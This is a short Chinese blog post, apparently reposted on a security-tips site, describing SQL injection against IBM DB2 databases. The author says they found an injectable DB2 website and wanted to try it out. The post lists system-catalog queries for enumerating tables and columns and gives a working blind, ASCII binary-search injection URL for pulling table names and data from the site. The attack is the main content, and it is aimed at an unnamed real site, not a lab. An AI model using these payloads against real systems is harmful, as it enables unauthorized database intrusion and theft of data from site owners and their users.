Sql Injection in DB2数据库

所属分类: 实用技巧 / 漏洞研究 阅读数: 1411
收藏 0 赞 0 分享
使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。 
参考了IBM DB2的文档,总结了这样几条: 

1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER 
可以返回系统中所有用户创建的表(table)名 

2、select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME=''  
返回表中的列名 

3、select NAME from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY 
这是最关键的地方,返回第一条记录,类似于sql server中的top 1 

4、SUBSTR(string, position, length) 
返回字符串子串的函数,类似于mid 

5、ASCII()这个就不用多说了。 

有了这些语句和函数,我们就可以很方便的用ascii拆半法猜出所有的table名,字段名,以及其中的数据了。 

例如判断第一个table的名称的第一个字符的ascii码是否大于50: 
http://*.com?test.jsp?id=1 and (select ASCII(SUBSTR(NAME,1,1)) from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 -- 


http://blog.waynedeng.com/blogview.asp?logID=543 
更多精彩内容其他人还在看

IDS入侵特征库创建实例解析

IDS入侵特征库创建实例解析
收藏 0 赞 0 分享

Access的跨库查询 (图)

Access的跨库查询 (图)
收藏 0 赞 0 分享

针对ACCESS漏洞又一发现

针对ACCESS漏洞又一发现
收藏 0 赞 0 分享

入侵之中杀防火墙进程的代码

入侵之中杀防火墙进程的代码
收藏 0 赞 0 分享

linux的病毒发展史及分类

linux的病毒发展史及分类
收藏 0 赞 0 分享

特络伊木马如何利用文件关联和设置名

特络伊木马如何利用文件关联和设置名
收藏 0 赞 0 分享

对RPC DCOM 蠕虫的设想

对RPC DCOM 蠕虫的设想
收藏 0 赞 0 分享

shell.application对象的漏洞描述

shell.application对象的漏洞描述
收藏 0 赞 0 分享

QQ尾巴病毒核心技术的实现

QQ尾巴病毒核心技术的实现
收藏 0 赞 0 分享

游戏外挂分析

游戏外挂分析
收藏 0 赞 0 分享
查看更多